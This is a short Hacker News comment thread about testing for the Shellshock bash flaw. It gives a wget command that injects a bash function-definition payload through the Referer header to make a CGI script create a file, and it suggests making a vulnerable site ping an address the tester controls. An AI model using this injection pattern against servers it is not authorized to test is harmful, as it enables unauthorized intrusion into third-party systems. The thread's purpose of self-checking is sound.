Hacker News new | past | comments | ask | show | jobs | submit login

Has anyone constructed this exploit as a simple `wget` command?

wget --header='Referer: () { :;}; touch /tmp/vulnerable ' www.example.com

Note that you'll typically want to supply the URL to a CGI script on the site, not just www.example.com. Don't think you're unaffected just because the top-level page of your site doesn't appear vulnerable.

Is there some easy way of detecting a site you don't control is vulnerable without bringing it down?

Yes, you can ask it to ping an address you control and record where the pings come from.

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact